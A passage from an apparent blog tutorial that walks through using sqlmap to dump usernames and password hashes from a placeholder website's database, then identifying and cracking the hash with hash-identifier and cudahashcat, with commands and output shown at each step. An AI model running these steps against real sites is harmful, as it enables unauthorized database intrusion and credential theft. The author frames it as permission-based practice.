[10:57:43] [INFO] retrieved: tinyint(4)

AHA! This is exactly what we are looking for … target table user_login and user_password .

use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-4

Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection

SQLMAP SQL Injection makes is Easy! Just run the following command again:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump

Guess what, we now have the username from the database:

[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes

use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-5

Almost there, we now only need the password to for this user.. Next shows just that..

Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection

You’re probably getting used to on how to use SQLMAP SQL Injection tool. Use the following command to extract password for the user.

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump

TADA!! We have password.

[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+

use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-6

But hang on, this password looks funny. This can’t be someone’s password.. Someone who leaves their website vulnerable like that just can’t have a password like that.

That is exactly right. This is a hashed password. What that means, the password is encrypted and now we need to decrypt it.

I have covered how to decrypt password extensively on this Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux post. If you’ve missed it, you’re missing out a lot.

I will cover it in short here but you should really learn how to use hashcat.

Step 7: Cracking password

So the hashed password is 24iYBc17xK0e. . How do you know what type of hash is that?

Step 7.a: Identify Hash type

Luckily, Kali Linux provides a nice tool and we can use that to identify which type of hash is this. In command line type in the following command and on prompt paste the hash value:

hash-identifier

use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-7

Excellent. So this is DES(Unix) hash.

Step 7.b: Crack HASH using cudahashcat

First of all I need to know which code to use for DES hashes. So let’s check that:

cudahashcat --help | grep DES

use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-8

So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500.

I am running a Computer thats got NVIDIA Graphics card. That means I will be using cudaHashcat. On my laptop, I got an AMD ATI Graphics cards, so I will be using oclHashcat on my laptop. If you’re on VirtualBox or VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali in either a persisitent USB or in Hard Disk. Instructions are in the website, search around.

I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running:

cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt

use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-9

Interesting find: Usuaul Hashcat was unable to determine the code for DES hash. (not in it’s help menu). Howeverm both cudaHashcat and oclHashcat found and cracked the key.

Anyhow, so here’s the cracked password: abc123. 24iYBc17xK0e.:abc123

Sweet, we now even have the password for this user.

Conclusion

Thanks for reading and visiting my website.

There’s many other ways to get into a Database or obtain user information. You should practice such techniques on websites that you have permission to.

Please share and let everyone know how to test their websites using this technique.

https://www.hackthissite.org/

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s